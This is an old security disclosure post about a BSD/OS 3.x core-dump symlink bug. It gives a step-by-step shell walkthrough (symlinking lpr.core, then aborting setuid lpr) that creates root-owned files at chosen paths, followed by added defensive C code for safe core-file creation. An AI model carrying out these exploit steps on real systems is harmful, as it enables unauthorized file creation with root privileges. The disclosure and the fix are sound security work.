BSD/OS beep.cs.huji.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #2: Mon Mar 31
13:39:46 IDT 1997 danny@sexta.cs.huji.ac.il:/usr/src/sys/compile/SEXTA
i386
A small and neat bug in BSDi 3.x allows people to arbitrarily write files
with crap for data, but not overwrite them. Like so:
Have a symbolic link, called [programname].core to desired file. Program
must be setuid root.
beep[ /tmp ] ls -la lpr.core
lrwxrwxrwt 1 root wheel 9 Jun 19 20:30 lpr.core@ -> /etc/TEST
beep[ /tmp ]
Just to make sure that file doesn't exist:
beep[ /tmp ] ls -la /etc/TEST
ls: /etc/TEST: No such file or directory
beep[ /tmp ]
Run the program. (In our case lpr is convenient since it waits for tty input
and suspends itself.)
beep[ /tmp ] lpr &
[1] 27886
beep[ /tmp ]
[1] + Suspended (tty input) lpr
beep[ /tmp ]
Kill it with the ABRT signal.
beep[ /tmp ] kill -ABRT %1
beep[ /tmp ] fg
lpr
Abort (core dumped)
beep[ /tmp ]
And voila:
beep[ /tmp ] ls -la /etc/TEST
-rw------- 1 root wheel 184320 Jun 19 20:39 /etc/TEST
beep[ /tmp ]
This exploit is similar to the Solaris 2.4 core exploit - with a few
notable differences:
A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
program with privileges isn't necessary.
B.) BSDi _does_ however, check if the file exists, so it's quite
impossible to overwrite files.
C.) BSDi _does_ change the permissions of the core dump to 600, and it
keeps on being owned by root, so changing the file is impossible as well.
Regards,
Nir.
--
Nir Soffer AKA ScorpioS, scorpios@cs.huji.ac.il
USER, n.: The word computer professionals use when they mean "idiot."
-- Dave Barry, "Claw Your Way to the Top"
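The root cause above is a privileged writer (the kernel's core dumper) opening a path in a world-writable directory and following whatever symlink sits there. As an added example that is not part of the original post, this C code shows the defensive pattern such a writer should use: refuse symlinks at open time (O_NOFOLLOW, a modern flag assumed here, not something BSD/OS 3.0 offered), refuse pre-existing files (O_EXCL, the check BSDi already did), and fstat the descriptor afterwards. The demo builds a throwaway directory with a constructed `lpr.core -> TEST` symlink, mirroring the post.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a brand-new core-style file at `path` as `owner`, never through a
 * symlink. O_NOFOLLOW rejects a symlink at the last component, O_EXCL rejects
 * any existing file, and fstat confirms the descriptor really is a fresh
 * regular file with a single link owned by us. Returns an fd, or -1. */
int safe_create_core(const char *path, uid_t owner) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != owner) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: lpr.core is a symlink to a file that does not exist
 * yet (exactly the /etc/TEST setup from the post). Returns 0 when the
 * symlinked path is refused, the target stays absent, and a plain path
 * still works. */
int demo(void) {
    char dir[] = "/tmp/coredemoXXXXXX";
    if (!mkdtemp(dir)) return -1;
    char link[256], target[256], plain[256];
    snprintf(target, sizeof target, "%s/TEST", dir);
    snprintf(link, sizeof link, "%s/lpr.core", dir);
    snprintf(plain, sizeof plain, "%s/plain.core", dir);
    if (symlink(target, link) < 0) return -1;
    int via_link = safe_create_core(link, getuid());   /* must be -1 */
    int direct = safe_create_core(plain, getuid());    /* must be >= 0 */
    struct stat st;
    int target_created = (stat(target, &st) == 0);    /* must be 0 */
    if (via_link >= 0) close(via_link);
    if (direct >= 0) close(direct);
    unlink(target); unlink(link); unlink(plain); rmdir(dir);
    return (via_link == -1 && direct >= 0 && !target_created) ? 0 : 1;
}
```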